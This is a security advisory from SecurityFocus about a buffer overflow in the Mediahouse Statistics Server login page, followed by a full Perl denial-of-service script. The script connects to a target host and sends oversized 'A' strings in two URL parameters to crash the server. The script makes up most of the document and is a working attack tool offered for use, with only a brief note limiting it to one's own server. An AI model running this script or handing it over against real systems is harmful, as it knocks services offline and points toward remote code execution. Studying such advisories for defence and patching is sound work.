source: http://www.securityfocus.com/bid/734/info The web interface for Statistics Server contains an unchecked buffer which accepts input from the "Server ID" field of the login webpage. While the login webpage has a 16 character restriction, this is easily circumventible by editing the HTML to remove the restriction. Entering a string of more than 3773 characters will crash the server. This bug could potentially be used to remotely execute arbitrary code. #!/usr/bin/perl ############################################################### # Sample DoS against the Mediahouse Statistics Server # This was tested against 4.28 & 5.01 running on Windows NT 4.0 # # Only use it to determine if your own Server is vulnerable! # # Per Bergehed ([email protected]) # # http://w1.855.telia.com/~u85513179/security/exploits/mediahouse.html # # V1.0 - Check for "ss?form=statsredir&ID=..." buffer overflow. # V1.1 - added check for "ss?form=setsite&ID=..." buffer overflow. # use IO::Socket; print "############################################################\n"; print "# Simple DoS-attack against the Mediahouse Statistics Server\n"; print "# Tested with version 4.28 & 5.01\n"; print "\n"; if ($#ARGV != 0) { die "-> Please give the host address as argument.\n" } opensocket ("\n"); print $remote "GET " . "ss?setsite=" . "A" x 40000 . "& HTTP/1.0\n\n"; print $remote "GET " . "ss?form=statsredir&ID=" . "A" x 40000 . "& HTTP/1.0\n\n"; close $remote; opensocket ("\n-> The server seemed to be vulnerable to this attack\n"); close $remote; die "-> The server does not seem to be vulnerable to this attack\n"; sub opensocket { $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $ARGV[0], PeerPort => "http(80)", ) || die "# Can't open http-port on $ARGV[0]$_[0]"; $remote->autoflush(1) } # EOF